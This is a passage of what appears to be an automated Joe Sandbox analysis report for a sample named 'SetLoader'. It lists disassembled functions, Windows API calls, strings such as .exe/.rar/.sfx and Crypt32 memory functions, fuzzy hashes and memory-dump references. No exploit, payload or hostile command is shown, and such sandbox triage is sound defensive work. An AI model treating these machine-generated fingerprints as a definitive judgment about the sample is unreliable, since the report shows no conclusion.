                                              • Instruction ID: 7f6056c6d54bd7432b2694a0bad16a9338ded5c34b268de5850fe38cb1b4600f
                                              • Opcode Fuzzy Hash: 0aa9fc7438669200ded9a05410e305dd0d8b8ba4c3280b9a5c8b905434613fd4
                                              • Instruction Fuzzy Hash: 69014736209B126EB72067B4FC867662F47EB07771FA0332DF111862E1EF514C0091C8
                                              Function 0063B9A5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063B9A9
                                              • _free.LIBCMT ref: 0063B9DC
                                              • _free.LIBCMT ref: 0063BA04
                                              • SetLastError.KERNEL32(00000000,?), ref: 0063BA11
                                              • SetLastError.KERNEL32(00000000,?), ref: 0063BA1D
                                              • _abort.LIBCMT ref: 0063BA23
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: cfe71196f4efb74afd25389386bbd954cb13147d144bc80054a052c1441424e7
                                              • Instruction ID: 472f32af510832c25c81059952591e677332c04e65691f1c9b9dfe15d1a836ce
                                              • Opcode Fuzzy Hash: cfe71196f4efb74afd25389386bbd954cb13147d144bc80054a052c1441424e7
                                              • Instruction Fuzzy Hash: 5BF0A436104A0167C796B725BD0ABAB256BDFC3B75F252118F715A22D3EF218C0251D9
                                              Function 0063004D Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00630059
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00630073
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00630084
                                              • TranslateMessage.USER32(?), ref: 0063008E
                                              • DispatchMessageW.USER32(?), ref: 00630098
                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 006300A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 2148572870-0
                                              • Opcode ID: 4ce579dd56a91440ddfa2292f38963ba2510020c325beb5f837ae992a2754a4b
                                              • Instruction ID: 460d2b79de066a376ca1f2a1a2ee75c2257104ff03c68e1448b160e6ff826331
                                              • Opcode Fuzzy Hash: 4ce579dd56a91440ddfa2292f38963ba2510020c325beb5f837ae992a2754a4b
                                              • Instruction Fuzzy Hash: 43F0E7B2A0122DABDB346BA5DC4CEDB7F6EEF42791F009021B50AD2150D674D586CBE1
                                              Function 0061E033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00622663: _wcslen.LIBCMT ref: 00622669
                                                • Part of subcall function 0061D848: _wcsrchr.LIBVCRUNTIME ref: 0061D85F
                                              • _wcslen.LIBCMT ref: 0061E105
                                              • _wcslen.LIBCMT ref: 0061E14D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$_wcsrchr
                                              • String ID: .exe$.rar$.sfx
                                              • API String ID: 3513545583-31770016
                                              • Opcode ID: c6c728dfb29f1db6ef7ffcf1f6b15d3d559b383704df988e86cc3976ef456dd1
                                              • Instruction ID: 1644c175a7f711ab74eb98bd63c2c5022a909626fad49966199c20c821b71ffc
                                              • Opcode Fuzzy Hash: c6c728dfb29f1db6ef7ffcf1f6b15d3d559b383704df988e86cc3976ef456dd1
                                              • Instruction Fuzzy Hash: 29412522500B61A6C7326F30C852AFB73ABEF49745F19490EFC869B280E7A2CDD1C355
                                              Function 0061DA1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 0061DA59
                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0061BD19,?,?,00000800,?,?,?,0061BCD4), ref: 0061DB02
                                              • _wcslen.LIBCMT ref: 0061DB70
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$CurrentDirectory
                                              • String ID: UNC$\\?\
                                              • API String ID: 3341907918-253988292
                                              • Opcode ID: 133e4b5b19ec3233e9668466001b4080df3c528b43b80eaa860b953a082fcf07
                                              • Instruction ID: eeeeb53683484b28c3c71992d01b1fc8b5c14f56509aa067192d31910f28a543
                                              • Opcode Fuzzy Hash: 133e4b5b19ec3233e9668466001b4080df3c528b43b80eaa860b953a082fcf07
                                              • Instruction Fuzzy Hash: AB41A3B25083526ACB20EB60DCC1DFB73AFAF46740F0D481DF595D7281E7A498C5C6A6
                                              Function 006110E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: %c
                                              • API String ID: 176396367-3300841138
                                              • Opcode ID: 4d1b6e8d5c290c8d747c1a2d4b8b821d835b0b94f48ba5b7b2f698b849a0c1f3
                                              • Instruction ID: 142fe0b1c59ef1e495a2deb4bbe3769a522c7c9db10f06b82f5ceaaa50930ed7
                                              • Opcode Fuzzy Hash: 4d1b6e8d5c290c8d747c1a2d4b8b821d835b0b94f48ba5b7b2f698b849a0c1f3
                                              • Instruction Fuzzy Hash: FA41D2719047529BC365DF38C85599FBBE9EF85300F04492DF989D3241EB30E9898BD6
                                              Function 0063A6C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0063A676,0063B5C6,?,0063A616,0063B5C6,0064F7B0,0000000C,0063A76D,0063B5C6,00000002), ref: 0063A6E5
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0063A6F8
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0063A676,0063B5C6,?,0063A616,0063B5C6,0064F7B0,0000000C,0063A76D,0063B5C6,00000002,00000000), ref: 0063A71B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: a4060f8faf85166edec125cd85ac317c7ec1eacb49e2a5eb3e6f39546bc00853
                                              • Instruction ID: e70d852341bf0d8b082dd2d0ce9c6fa7a1e10489d70751712778a07ddbc011a9
                                              • Opcode Fuzzy Hash: a4060f8faf85166edec125cd85ac317c7ec1eacb49e2a5eb3e6f39546bc00853
                                              • Instruction Fuzzy Hash: 23F0A434540208FBCB009FA0DC89BEEBFB7EB09715F000068F805A2250CB705E40DB91
                                              Function 00611366 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00620244: _swprintf.LIBCMT ref: 00620284
                                                • Part of subcall function 00620244: _strlen.LIBCMT ref: 006202A5
                                                • Part of subcall function 00620244: SetDlgItemTextW.USER32(?,00652274,?), ref: 006202FE
                                                • Part of subcall function 00620244: GetWindowRect.USER32(?,?), ref: 00620334
                                                • Part of subcall function 00620244: GetClientRect.USER32(?,?), ref: 00620340
                                              • GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                              • SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                              • String ID: 0$pPe$pPe
                                              • API String ID: 2622349952-4176609419
                                              • Opcode ID: ce8ff5eea21ef35b8675650a6c3b11c15dbe9de05f3fc2c281c5a9ff30a662b1
                                              • Instruction ID: 1779f180d8d7b02b8f27b030917c1f46b0814706bb1b6bc5ca594921951220b4
                                              • Opcode Fuzzy Hash: ce8ff5eea21ef35b8675650a6c3b11c15dbe9de05f3fc2c281c5a9ff30a662b1
                                              • Instruction Fuzzy Hash: 76F0A43010434CA6DF190F21DC1DBEA3B6BAB02314F884114FE5958AD6DBB4C5D0DF50
                                              Function 006212F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 006228AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006228D4
                                                • Part of subcall function 006228AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00621309,Crypt32.dll,00000000,00621383,00000200,?,00621366,00000000,00000000,?), ref: 006228F4
                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00621315
                                              • GetProcAddress.KERNEL32(0065C1F0,CryptUnprotectMemory), ref: 00621325
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                              • API String ID: 2141747552-1753850145
                                              • Opcode ID: 88abc82235355af731ba170923895c403f73bcbeb4cdbd3dd374e8aeb021c2c4
                                              • Instruction ID: d3d2e191bd92e86842a2efaff16031dec957e89b4ca2ac11e3415f0766d52346
                                              • Opcode Fuzzy Hash: 88abc82235355af731ba170923895c403f73bcbeb4cdbd3dd374e8aeb021c2c4
                                              • Instruction Fuzzy Hash: CCE08674E44B519ED7209F34E9097827EE75F27B04F05881DF0C597A40D6B4D8848F52
                                              Function 006351FA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AdjustPointer$_abort
                                              • String ID:
                                              • API String ID: 2252061734-0
                                              • Opcode ID: ce9ba01c3f7cdca20517c35aeb9b12882eb106da8b42e645210a9511885e997f
                                              • Instruction ID: d14ea677232ac3d70325c6ad440818e7ca30ce307fe3057a21d24e44b4e3cba9
                                              • Opcode Fuzzy Hash: ce9ba01c3f7cdca20517c35aeb9b12882eb106da8b42e645210a9511885e997f
                                              • Instruction Fuzzy Hash: B151DE72604A06AFEB298F50D841BBBB3A6EF44750F14452DE807972A1E7B1ED81CBD0
                                              Function 0063E580 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0063E589
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0063E5AC
                                                • Part of subcall function 0063BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0063E5D2
                                              • _free.LIBCMT ref: 0063E5E5
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0063E5F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: f8f99e24e94c2590659496869475cdee92b359eef63dac1758e7da03ba3ac180
                                              • Instruction ID: 66239da2241e4a0a281646521d7690597f1eb23d091f1d0a32ebeecf9fb2c198
                                              • Opcode Fuzzy Hash: f8f99e24e94c2590659496869475cdee92b359eef63dac1758e7da03ba3ac180
                                              • Instruction Fuzzy Hash: 11012476601A117F2721567A9C48CFB6A6FEEC3BB47141129B904C3281FF638C0281F1
                                              Function 0063BA29 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,0063BC80,0063D7D8,?,0063B9D3,00000001,00000364,?,00636E12,?,?,?,0063688D,00000050), ref: 0063BA2E
                                              • _free.LIBCMT ref: 0063BA63
                                              • _free.LIBCMT ref: 0063BA8A
                                              • SetLastError.KERNEL32(00000000,?), ref: 0063BA97
                                              • SetLastError.KERNEL32(00000000,?), ref: 0063BAA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 13b31f34b097382eb5219dda4809775eff2e0a57bb86d03ba6260c8e079baa82
                                              • Instruction ID: 6d84133fa043f842bd7fb1ba617893ac1263ad2634a5f09093e3468c60e6e342
                                              • Opcode Fuzzy Hash: 13b31f34b097382eb5219dda4809775eff2e0a57bb86d03ba6260c8e079baa82
                                              • Instruction Fuzzy Hash: 7E01F936104F056B8316EB39AD96A9B216FDBC3775F212028F71592252EF718D0251E5
                                              Function 00622FC9 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 006232AF: ResetEvent.KERNEL32(?), ref: 006232C1
                                                • Part of subcall function 006232AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 006232D5
                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000,5CB4B331,?,?,00000001,?,006452FF,000000FF,?,006243C0,?,00000000,?,00614766), ref: 00623007
                                              • CloseHandle.KERNEL32(?,?,?,006243C0,?,00000000,?,00614766,?,?,?,00000000,?,?,?,00000001), ref: 00623021
                                              • DeleteCriticalSection.KERNEL32(?,?,006243C0,?,00000000,?,00614766,?,?,?,00000000,?,?,?,00000001,?), ref: 0062303A
                                              • CloseHandle.KERNEL32(?,?,006243C0,?,00000000,?,00614766,?,?,?,00000000,?,?,?,00000001,?), ref: 00623046
                                              • CloseHandle.KERNEL32(?,?,006243C0,?,00000000,?,00614766,?,?,?,00000000,?,?,?,00000001,?), ref: 00623052
                                                • Part of subcall function 006230CA: WaitForSingleObject.KERNEL32(?,000000FF,006232E6,?), ref: 006230D0
                                                • Part of subcall function 006230CA: GetLastError.KERNEL32(?), ref: 006230DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                              • String ID:
                                              • API String ID: 1868215902-0
                                              • Opcode ID: d976b624cbbb37d14b11784fe6611d74340f2dc4a250ee406576c389f48d1905
                                              • Instruction ID: 8f67b71d1106bb51f5f197db946e4462e428676396e046033de1aa532f8745bf
                                              • Opcode Fuzzy Hash: d976b624cbbb37d14b11784fe6611d74340f2dc4a250ee406576c389f48d1905
                                              • Instruction Fuzzy Hash: 7D118476500B54EFC7229F64ED84FC6BBABFB09B11F00092DF16792260CB766A44CB65
                                              Function 0063EE4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 0063EE67
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063EE79
                                              • _free.LIBCMT ref: 0063EE8B
                                              • _free.LIBCMT ref: 0063EE9D
                                              • _free.LIBCMT ref: 0063EEAF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 58f60ca051e567d1db11daf4343cfd97188c89a9b27e3e02e829135f0a3de4e9
                                              • Instruction ID: 98cf17d5fd5f99ea027fe57830e55f01fcbb3d6e70e4337840d27ac888f90089
                                              • Opcode Fuzzy Hash: 58f60ca051e567d1db11daf4343cfd97188c89a9b27e3e02e829135f0a3de4e9
                                              • Instruction Fuzzy Hash: AAF0EC32504701AF87A4EB69E886C9A77EBFA41711F541809F549D7681CB71FC808AA4
                                              Function 00623748 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
